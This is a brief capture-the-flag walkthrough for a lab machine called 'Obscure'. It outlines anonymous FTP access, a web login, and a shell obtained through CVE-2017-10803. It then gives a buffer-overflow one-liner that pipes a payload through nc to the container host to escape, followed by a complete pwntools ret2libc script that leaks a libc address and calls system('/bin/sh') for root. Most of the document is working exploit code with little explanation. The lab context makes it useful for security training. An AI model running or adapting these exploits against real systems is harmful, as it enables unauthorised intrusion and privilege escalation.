Let’s talk about Obscure
.
1. Connect to the FTP server as anonymous
Retrieve the password from the FTP server.
2. Login to the webserver
Use the password to login to the webserver. You need to figure out the email address of the user as well.
3. Exploit the webserver to get a shell
CVE-2017-10803 is a vulnerability in the webserver. Exploit it to get a shell.
4. Exploit the binary to escape from the container
Use this one-liner to get a shell on the host machine.
python -c 'print(b"A"*136 + b"\x47\x06\x40\x00")' > payload && cat payload - | nc 172.17.0.1 4444
5. Get root
And finally, using this exploit, perform a ret2libc attack to get root, remotely. Transfer exploit_me
and /lib/x86_64-linux-gnu/libc.so.6
to your machine and run the exploit.
from pwn import ELF, ROP, remote, log, p64, u64 , process, ssh
user = "zeeshan"
keyfile= "id_rsa"
port = 22
HOST = "10.10.xxx.xxx"
s = ssh(host=HOST, user=user, keyfile=keyfile, port=port)
LOCAL_BIN = "./exploit_me"
LIBC = ELF("./libc.so.6")
P = s.process("/exploit_me")
ELF_LOADED = ELF(LOCAL_BIN)
ENV = {"LD_PRELOAD": LIBC} if LIBC else {}
ROP_LOADED = ROP(ELF_LOADED)
OFFSET = b"A"*40
libc_func = "puts"
PUTS_PLT = ELF_LOADED.symbols["puts"]
MAIN_PLT = ELF_LOADED.symbols['main']
POP_RDI = (ROP_LOADED.find_gadget(['pop rdi', 'ret']))[0]
RET = (ROP_LOADED.find_gadget(['ret']))[0]
log.info("Main start: " + hex(MAIN_PLT))
log.info("Puts plt: " + hex(PUTS_PLT))
log.info("pop rdi; ret gadget: " + hex(POP_RDI))
log.info("ret gadget: " + hex(RET))
def generate_payload_aligned(rop):
payload1 = OFFSET + rop
if (len(payload1) % 16) == 0:
return payload1
else:
payload2 = OFFSET + p64(RET) + rop
if (len(payload2) % 16) == 0:
log.info("Payload aligned successfully")
return payload2
else:
log.warning(f"I couldn't align the payload! Len: {len(payload1)}")
return payload1
def get_addr(libc_func):
FUNC_GOT = ELF_LOADED.got[libc_func]
log.info(libc_func + " GOT @ " + hex(FUNC_GOT))
rop1 = p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
rop1 = generate_payload_aligned(rop1)
P.recvuntil(b"!")
P.sendline(rop1)
P.recvline()
recieved = P.recvline().strip()
log.critical(f"Recieved: {recieved}")
log.info(f"Recieved: {recieved}")
log.info(f"Len rop1: {len(rop1)}")
leak = u64(recieved.ljust(8, b"\x00"))
log.info(f"Leaked LIBC address, {libc_func}: {hex(leak)}")
if LIBC:
LIBC.address = leak - LIBC.symbols[libc_func] #Save LIBC base
print("If LIBC base doesn't end end 00, you might be using an icorrect libc library")
log.info("LIBC base @ %s" % hex(LIBC.address))
else:
print("TO CONTINUE) Find the LIBC library and continue with the exploit... (https://LIBC.blukat.me/)")
P.interactive()
return hex(leak)
get_addr(libc_func) #Search for puts address in memmory to obtain LIBC base
BINSH = next(LIBC.search(b"/bin/sh")) #Verify with find /bin/sh
SYSTEM = LIBC.sym["system"]
EXIT = LIBC.sym["exit"]
log.info("POP_RDI %s " % hex(POP_RDI))
log.info("bin/sh %s " % hex(BINSH))
log.info("system %s " % hex(SYSTEM))
log.info("exit %s " % hex(EXIT))
rop2 = p64(POP_RDI) + p64(BINSH) + p64(SYSTEM) #p64(EXIT)
rop2 = generate_payload_aligned(rop2)
print(P.clean())
P.sendline(rop2)
P.interactive() #Interact with your shell :)